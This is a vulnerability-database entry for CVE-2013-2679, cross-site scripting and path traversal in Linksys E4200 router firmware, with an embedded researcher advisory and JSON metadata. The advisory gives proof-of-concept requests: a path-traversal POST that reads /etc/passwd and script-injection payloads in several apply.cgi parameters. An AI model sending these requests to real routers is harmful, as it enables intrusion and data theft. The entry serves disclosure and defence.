var-202002-0520
Vulnerability from variot
Multiple cross-site scripting (XSS) vulnerabilities in Cisco Linksys E4200 router with firmware 1.0.05 build 7 allow remote attackers to inject arbitrary web script or HTML via the (1) log_type, (2) ping_ip, (3) ping_size, (4) submit_type, or (5) traceroute_ip parameter to apply.cgi or (6) new_workgroup or (7) submit_button parameter to storage/apply.cgi. Cisco Linksys E4200 A cross-site scripting vulnerability exists in routers.Information may be obtained and tampered with. The Cisco Linksys E1200 N300 is a wireless router from Cisco, USA. When a user browses an affected website, their browser will execute arbitrary code provided by the attacker, which may cause the attacker to steal cookie-based authentication and launch other attacks. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
=============================================
XSS, LFI in Cisco, Linksys E4200 Firmware
=============================================
URL: http://www.cloudscan.me/2013/05/xss-lfi-linksys-e4200-firmware-0d.html
=============================================
January 30, 2013
=============================================
Keywords
=============================================
XSS, Cross Site Scripting, CWE-79, CAPEC-86, Javascript Injection, Exploit, Zero Day, Cisco, Linksys, E4200, Wireless Router, cyberTAN Corp
CVE-2013-2678, CVE-2013-2679, CVE-2013-2680, CVE-2013-2681, CVE-2013-2682, CVE-2013-2683, CVE-2013-2684
=============================================
Summary
Reflected XSS + LFI Bugs in the Cisco, Linksys E4200 Wireless Router Firmware Version: 1.0.05 build 7 were discovered by our Researchers in January 2013 and finally acknowledged by Linksys in April 2013. The Vendor is unable to Patch the Vulnerability in a reasonable timeframe. This document will introduce and discuss the vulnerability and provide Proof-of-Concept (PoC) Zero Day (0D) code examples for Firmware L Version 1.10 Released on July 9, 2012, and prior versions.
=============================================
Overview
Linksys is a brand of home and small office networking products and a company founded in 1988, which was acquired by Cisco Systems in 2003. In 2013, as part of its push away from the consumer market, Cisco sold their home networking division and Linksys to Belkin.
Products currently and previously sold under the Linksys brand name include broadband and wireless routers, consumer and small business grade Ethernet switching, VoIP equipment, wireless internet video camera, AV products, network storage systems, and other products.
Linksys products were widely available in North America off-the-shelf from both consumer electronics stores (CompUSA and Best Buy), internet retailers, and big-box retail stores (WalMart). Linksys' significant competition as an independent networking firm were D-Link and NetGear, the latter for a time being a brand of Cisco competitor Nortel.
=============================================
Vendor Software Fingerprint
=============================================
Copyright (C) 2009, CyberTAN Corporation
All Rights Reserved.
THIS SOFTWARE IS OFFERED "AS IS", AND CYBERTAN GRANTS NO WARRANTIES OF
ANY
KIND, EXPRESS OR IMPLIED, BY STATUTE.....
=============================================
The PoC's
=============================================
LFI PoC
=============================================
POST /storage/apply.cgi HTTP/1.1
HOST: my.vunerable.e4500.firmware
submit_type=nas_admin&submit_button=NAS_Administration&change_action=gozila _cgi&next_page=../../../../../../../../../../../../../../../../etc/passwd
=============================================
XSS PoC
=============================================
/apply.cgi [log_type parameter]
/apply.cgi [ping_ip parameter]
/apply.cgi [ping_size parameter]
/apply.cgi [submit_type parameter]
/apply.cgi [traceroute_ip parameter]
/storage/apply.cgi [new_workgroup parameter]
/storage/apply.cgi [submit_button parameter]
=============================================
POST /apply.cgi HTTP/1.1
�..
change_action=gozila_cgi&submit_button=Log_View&submit_type=undefined&log_t ype=&log_type=ilog14568"%3balert(1)//482
=============================================
Other XSS PoC�s
=============================================
&ping_ip='>
&ping_size='>
&submit_type=start_traceroute'%3balert(1)//
&traceroute_ip=a.b.c.d">
=============================================
CVE Information
=============================================
File path traversal CVE-2013-2678
Cross-site scripting (reflected) CVE-2013-2679
Cleartext submission of password CVE-2013-2680
Password field with autocomplete enabled CVE-2013-2681
Frameable response (Clickjacking) CVE-2013-2682
Private IP addresses disclosed CVE-2013-2683
HTML does not specify charset CVE-2013-2684
CVSS Version 2 Score = 4.5
=============================================
END
=============================================
-----BEGIN PGP SIGNATURE----- Version: 10.2.0.2526
wsBVAwUBUYkNUnz+WcLIygj0AQg1/QgAs9Ij9d9e6IYfZXeeiCZTwoKdgtOVkser M3c49LB4CnJrxMqlrVNhM5Y2YxjydpGG1EfNzc49L43dC2G/Q2cHRfQOWdgcIXEG uJPDmKcONMN+V+rwvncyulGnCgl7R7whxspjqQk4Ov6lM+rbL3ulEi5Lg2IwzoYy ul0J8okWO9hTBWh9cbAiUMMJ7FsC3Kb0KUH2NepathT604Pif4zHtxcYY62jOEdy 7xrUSt1HUw9HMC1s0MHLWcqUbJowSlx6cInl977WKphWB8bK0bqWJO+C0cCC3jdI V8qUOX2sfB2znwOcfsiTH4olBBH1nlXtnRJxyTr42qET4nBfqFOshg== =w123 -----END PGP SIGNATURE-----
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-202002-0520", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "linksys e4200", "scope": "eq", "trust": 1.0, "vendor": "belkin", "version": "1.0.05" }, { "model": "linksys e4200", "scope": "eq", "trust": 0.8, "vendor": "cisco", "version": "1.0.05 build 7" }, { "model": "linksys e1200 n300 router", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "2.0.04" }, { "model": "linksys e4200", "scope": null, "trust": 0.6, "vendor": "cisco", "version": null }, { "model": "linksys e4200 build", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.0.057" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2013-07838" }, { "db": "CNVD", "id": "CNVD-2013-05035" }, { "db": "BID", "id": "59715" }, { "db": "JVNDB", "id": "JVNDB-2013-007275" }, { "db": "NVD", "id": "CVE-2013-2679" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:belkin:linksys_e4200_firmware:1.0.05:build7:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:belkin:linksys_e4200:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2013-2679" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "sqlhacker", "sources": [ { "db": "BID", "id": "59715" }, { "db": "PACKETSTORM", "id": "121551" }, { "db": "CNNVD", "id": "CNNVD-201305-151" } ], "trust": 1.0 }, "cve": "CVE-2013-2679", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "exploitabilityScore": 8.6, "impactScore": 2.9, "integrityImpact": "PARTIAL", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "trust": 1.0, "userInteractionRequired": true, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Medium", "accessVector": "Network", "authentication": "None", "author": "NVD", "availabilityImpact": "None", "baseScore": 4.3, "confidentialityImpact": "None", "exploitabilityScore": null, "id": "JVNDB-2013-007275", "impactScore": null, "integrityImpact": "Partial", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "Medium", "trust": 0.8, "userInteractionRequired": null, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "id": "CNVD-2013-07838", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.6, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "id": "CNVD-2013-05035", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.6, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "NVD", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "exploitabilityScore": 2.8, "impactScore": 2.7, "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "trust": 1.0, "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, { "attackComplexity": "Low", "attackVector": "Network", "author": "NVD", "availabilityImpact": "None", "baseScore": 6.1, "baseSeverity": "Medium", "confidentialityImpact": "Low", "exploitabilityScore": null, "id": "JVNDB-2013-007275", "impactScore": null, "integrityImpact": "Low", "privilegesRequired": "None", "scope": "Changed", "trust": 0.8, "userInteraction": "Required", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0" } ], "severity": [ { "author": "NVD", "id": "CVE-2013-2679", "trust": 1.0, "value": "MEDIUM" }, { "author": "NVD", "id": "JVNDB-2013-007275", "trust": 0.8, "value": "Medium" }, { "author": "CNVD", "id": "CNVD-2013-07838", "trust": 0.6, "value": "MEDIUM" }, { "author": "CNVD", "id": "CNVD-2013-05035", "trust": 0.6, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201305-151", "trust": 0.6, "value": "MEDIUM" } ] } ], "sources": [ { "db": "CNVD", "id": "CNVD-2013-07838" }, { "db": "CNVD", "id": "CNVD-2013-05035" }, { "db": "JVNDB", "id": "JVNDB-2013-007275" }, { "db": "NVD", "id": "CVE-2013-2679" }, { "db": "CNNVD", "id": "CNNVD-201305-151" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Multiple cross-site scripting (XSS) vulnerabilities in Cisco Linksys E4200 router with firmware 1.0.05 build 7 allow remote attackers to inject arbitrary web script or HTML via the (1) log_type, (2) ping_ip, (3) ping_size, (4) submit_type, or (5) traceroute_ip parameter to apply.cgi or (6) new_workgroup or (7) submit_button parameter to storage/apply.cgi. Cisco Linksys E4200 A cross-site scripting vulnerability exists in routers.Information may be obtained and tampered with. The Cisco Linksys E1200 N300 is a wireless router from Cisco, USA. When a user browses an affected website, their browser will execute arbitrary code provided by the attacker, which may cause the attacker to steal cookie-based authentication and launch other attacks. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n \n=============================================\n \nXSS, LFI in Cisco, Linksys E4200 Firmware\n \n=============================================\n \nURL: http://www.cloudscan.me/2013/05/xss-lfi-linksys-e4200-firmware-0d.html\n \n=============================================\n \n \nJanuary 30, 2013\n \n=============================================\n \nKeywords\n \n=============================================\n \nXSS, Cross Site Scripting, CWE-79, CAPEC-86, Javascript Injection, Exploit,\nZero Day, Cisco, Linksys, E4200, Wireless Router, cyberTAN Corp\n \nCVE-2013-2678, CVE-2013-2679, CVE-2013-2680, CVE-2013-2681, CVE-2013-2682,\nCVE-2013-2683, CVE-2013-2684\n \n=============================================\n \nSummary\n \nReflected XSS + LFI Bugs in the Cisco, Linksys E4200 Wireless Router\nFirmware Version: 1.0.05 build 7 were discovered by our Researchers in\nJanuary 2013 and finally acknowledged by Linksys in April 2013. The Vendor\nis unable to Patch the Vulnerability in a reasonable timeframe. This\ndocument will introduce and discuss the vulnerability and provide\nProof-of-Concept (PoC) Zero Day (0D) code examples for Firmware L Version\n1.10 Released on July 9, 2012, and prior versions. \n \n=============================================\n \nOverview\n \nLinksys is a brand of home and small office networking products and a\ncompany founded in 1988, which was acquired by Cisco Systems in 2003. In\n2013, as part of its push away from the consumer market, Cisco sold their\nhome networking division and Linksys to Belkin. \n \n \n \nProducts currently and previously sold under the Linksys brand name include\nbroadband and wireless routers, consumer and small business grade Ethernet\nswitching, VoIP equipment, wireless internet video camera, AV products,\nnetwork storage systems, and other products. \n \n \n \nLinksys products were widely available in North America off-the-shelf from\nboth consumer electronics stores (CompUSA and Best Buy), internet\nretailers, and big-box retail stores (WalMart). Linksys\u0027 significant\ncompetition as an independent networking firm were D-Link and NetGear, the\nlatter for a time being a brand of Cisco competitor Nortel. \n \n=============================================\n \nVendor Software Fingerprint\n \n=============================================\n \n# Copyright (C) 2009, CyberTAN Corporation\n \n# All Rights Reserved. \n \n#\n \n# THIS SOFTWARE IS OFFERED \"AS IS\", AND CYBERTAN GRANTS NO WARRANTIES OF\nANY\n \n# KIND, EXPRESS OR IMPLIED, BY STATUTE..... \n \n=============================================\n \nThe PoC\u0027s\n \n=============================================\n \nLFI PoC\n \n=============================================\n \nPOST /storage/apply.cgi HTTP/1.1\n \nHOST: my.vunerable.e4500.firmware\n \nsubmit_type=nas_admin\u0026submit_button=NAS_Administration\u0026change_action=gozila\n_cgi\u0026next_page=../../../../../../../../../../../../../../../../etc/passwd\n \n=============================================\n \nXSS PoC\n \n=============================================\n \n /apply.cgi [log_type parameter]\n \n /apply.cgi [ping_ip parameter]\n \n /apply.cgi [ping_size parameter]\n \n /apply.cgi [submit_type parameter]\n \n /apply.cgi [traceroute_ip parameter]\n \n /storage/apply.cgi [new_workgroup parameter]\n \n /storage/apply.cgi [submit_button parameter]\n \n=============================================\n \nPOST /apply.cgi HTTP/1.1\n \n\ufffd.. \n \nchange_action=gozila_cgi\u0026submit_button=Log_View\u0026submit_type=undefined\u0026log_t\nype=\u0026log_type=ilog14568\"%3balert(1)//482\n \n=============================================\n \nOther XSS PoC\ufffds\n \n=============================================\n \n\u0026ping_ip=\u0027\u003e\u003cscript\u003ealert(1)\u003c/script\u003e\n \n\u0026ping_size=\u0027\u003e\u003cscript\u003ealert(1)\u003c/script\u003e\n \n\u0026submit_type=start_traceroute\u0027%3balert(1)//\n \n\u0026traceroute_ip=a.b.c.d\"\u003e\u003cscript\u003ealert(1)\u003c/script\u003e\n \n=============================================\n \nCVE Information\n \n=============================================\n \nFile path traversal CVE-2013-2678\n \nCross-site scripting (reflected) CVE-2013-2679\n \nCleartext submission of password CVE-2013-2680\n \nPassword field with autocomplete enabled CVE-2013-2681\n \nFrameable response (Clickjacking) CVE-2013-2682\n \nPrivate IP addresses disclosed CVE-2013-2683\n \nHTML does not specify charset CVE-2013-2684\n \nCVSS Version 2 Score = 4.5\n \n=============================================\n \nEND\n \n=============================================\n \n-----BEGIN PGP SIGNATURE-----\nVersion: 10.2.0.2526\n \nwsBVAwUBUYkNUnz+WcLIygj0AQg1/QgAs9Ij9d9e6IYfZXeeiCZTwoKdgtOVkser\nM3c49LB4CnJrxMqlrVNhM5Y2YxjydpGG1EfNzc49L43dC2G/Q2cHRfQOWdgcIXEG\nuJPDmKcONMN+V+rwvncyulGnCgl7R7whxspjqQk4Ov6lM+rbL3ulEi5Lg2IwzoYy\nul0J8okWO9hTBWh9cbAiUMMJ7FsC3Kb0KUH2NepathT604Pif4zHtxcYY62jOEdy\n7xrUSt1HUw9HMC1s0MHLWcqUbJowSlx6cInl977WKphWB8bK0bqWJO+C0cCC3jdI\nV8qUOX2sfB2znwOcfsiTH4olBBH1nlXtnRJxyTr42qET4nBfqFOshg==\n=w123\n-----END PGP SIGNATURE-----\n\n", "sources": [ { "db": "NVD", "id": "CVE-2013-2679" }, { "db": "JVNDB", "id": "JVNDB-2013-007275" }, { "db": "CNVD", "id": "CNVD-2013-07838" }, { "db": "CNVD", "id": "CNVD-2013-05035" }, { "db": "CNNVD", "id": "CNNVD-201305-055" }, { "db": "BID", "id": "59715" }, { "db": "BID", "id": "59558" }, { "db": "PACKETSTORM", "id": "121551" } ], "trust": 3.87 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2013-2679", "trust": 3.7 }, { "db": "PACKETSTORM", "id": "121551", "trust": 2.5 }, { "db": "OSVDB", "id": "93059", "trust": 1.6 }, { "db": "OSVDB", "id": "93060", "trust": 1.6 }, { "db": "BID", "id": "59558", "trust": 1.5 }, { "db": "BID", "id": "59715", "trust": 0.9 }, { "db": "JVNDB", "id": "JVNDB-2013-007275", "trust": 0.8 }, { "db": "CNVD", "id": "CNVD-2013-07838", "trust": 0.6 }, { "db": "EXPLOIT-DB", "id": "25292", "trust": 0.6 }, { "db": "CNVD", "id": "CNVD-2013-05035", "trust": 0.6 }, { "db": "CNNVD", "id": "CNNVD-201305-055", "trust": 0.6 }, { "db": "CNNVD", "id": "CNNVD-201305-151", "trust": 0.6 } ], "sources": [ { "db": "CNVD", "id": "CNVD-2013-07838" }, { "db": "CNVD", "id": "CNVD-2013-05035" }, { "db": "BID", "id": "59715" }, { "db": "BID", "id": "59558" }, { "db": "JVNDB", "id": "JVNDB-2013-007275" }, { "db": "PACKETSTORM", "id": "121551" }, { "db": "NVD", "id": "CVE-2013-2679" }, { "db": "CNNVD", "id": "CNNVD-201305-055" }, { "db": "CNNVD", "id": "CNNVD-201305-151" } ] }, "id": "VAR-202002-0520", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "CNVD", "id": "CNVD-2013-07838" }, { "db": "CNVD", "id": "CNVD-2013-05035" } ], "trust": 1.8375 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "Network device" ], "sub_category": null, "trust": 1.2 } ], "sources": [ { "db": "CNVD", "id": "CNVD-2013-07838" }, { "db": "CNVD", "id": "CNVD-2013-05035" } ] }, "last_update_date": "2023-12-18T12:17:20.620000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Top Page", "trust": 0.8, "url": "https://www.linksys.com/us/" }, { "title": "Cisco Linksys E1200 N300 Router \u0027submit_button\u0027 parameter cross-site scripting vulnerability patch", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchinfo/show/34770" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2013-07838" }, { "db": "JVNDB", "id": "JVNDB-2013-007275" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-79", "trust": 1.8 } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2013-007275" }, { "db": "NVD", "id": "CVE-2013-2679" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.4, "url": "http://packetstormsecurity.com/files/121551/cisco-linksys-e4200-cross-site-scripting-local-file-inclusion.html" }, { "trust": 2.0, "url": "http://www.cloudscan.me/2013/05/xss-lfi-linksys-e4200-firmware-0d.html" }, { "trust": 1.6, "url": "http://osvdb.org/93059" }, { "trust": 1.6, "url": "http://osvdb.org/93060" }, { "trust": 1.6, "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/84069" }, { "trust": 1.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2679" }, { "trust": 1.2, "url": "http://www.securityfocus.com/bid/59558" }, { "trust": 0.8, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-2679" }, { "trust": 0.6, "url": "http://www.exploit-db.com/exploits/25292/" }, { "trust": 0.3, "url": "http://support.linksys.com/en-us/support/routers/e4200" }, { "trust": 0.3, "url": "http://www.cisco.com" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2683" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2684" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2681" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2680" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2682" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2678" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2013-07838" }, { "db": "CNVD", "id": "CNVD-2013-05035" }, { "db": "BID", "id": "59715" }, { "db": "BID", "id": "59558" }, { "db": "JVNDB", "id": "JVNDB-2013-007275" }, { "db": "PACKETSTORM", "id": "121551" }, { "db": "NVD", "id": "CVE-2013-2679" }, { "db": "CNNVD", "id": "CNNVD-201305-055" }, { "db": "CNNVD", "id": "CNNVD-201305-151" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "CNVD", "id": "CNVD-2013-07838" }, { "db": "CNVD", "id": "CNVD-2013-05035" }, { "db": "BID", "id": "59715" }, { "db": "BID", "id": "59558" }, { "db": "JVNDB", "id": "JVNDB-2013-007275" }, { "db": "PACKETSTORM", "id": "121551" }, { "db": "NVD", "id": "CVE-2013-2679" }, { "db": "CNNVD", "id": "CNNVD-201305-055" }, { "db": "CNNVD", "id": "CNNVD-201305-151" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2013-06-24T00:00:00", "db": "CNVD", "id": "CNVD-2013-07838" }, { "date": "2013-05-10T00:00:00", "db": "CNVD", "id": "CNVD-2013-05035" }, { "date": "2013-05-06T00:00:00", "db": "BID", "id": "59715" }, { "date": "2013-04-27T00:00:00", "db": "BID", "id": "59558" }, { "date": "2020-03-09T00:00:00", "db": "JVNDB", "id": "JVNDB-2013-007275" }, { "date": "2013-05-07T20:22:22", "db": "PACKETSTORM", "id": "121551" }, { "date": "2020-02-18T17:15:12.500000", "db": "NVD", "id": "CVE-2013-2679" }, { "date": "2013-04-27T00:00:00", "db": "CNNVD", "id": "CNNVD-201305-055" }, { "date": "2013-05-09T00:00:00", "db": "CNNVD", "id": "CNNVD-201305-151" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2013-06-24T00:00:00", "db": "CNVD", "id": "CNVD-2013-07838" }, { "date": "2013-05-26T00:00:00", "db": "CNVD", "id": "CNVD-2013-05035" }, { "date": "2013-05-06T00:00:00", "db": "BID", "id": "59715" }, { "date": "2013-07-10T14:22:00", "db": "BID", "id": "59558" }, { "date": "2020-03-09T00:00:00", "db": "JVNDB", "id": "JVNDB-2013-007275" }, { "date": "2020-02-27T16:58:39.317000", "db": "NVD", "id": "CVE-2013-2679" }, { "date": "2013-05-03T00:00:00", "db": "CNNVD", "id": "CNNVD-201305-055" }, { "date": "2020-02-28T00:00:00", "db": "CNNVD", "id": "CNNVD-201305-151" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201305-055" }, { "db": "CNNVD", "id": "CNNVD-201305-151" } ], "trust": 1.2 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Cisco Linksys E4200 Router Cross-Site Scripting Vulnerability", "sources": [ { "db": "CNVD", "id": "CNVD-2013-05035" }, { "db": "CNNVD", "id": "CNNVD-201305-151" } ], "trust": 1.2 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "XSS", "sources": [ { "db": "CNNVD", "id": "CNNVD-201305-055" }, { "db": "CNNVD", "id": "CNNVD-201305-151" } ], "trust": 1.2 } }
Sightings
Author | Source | Type | Date |
---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.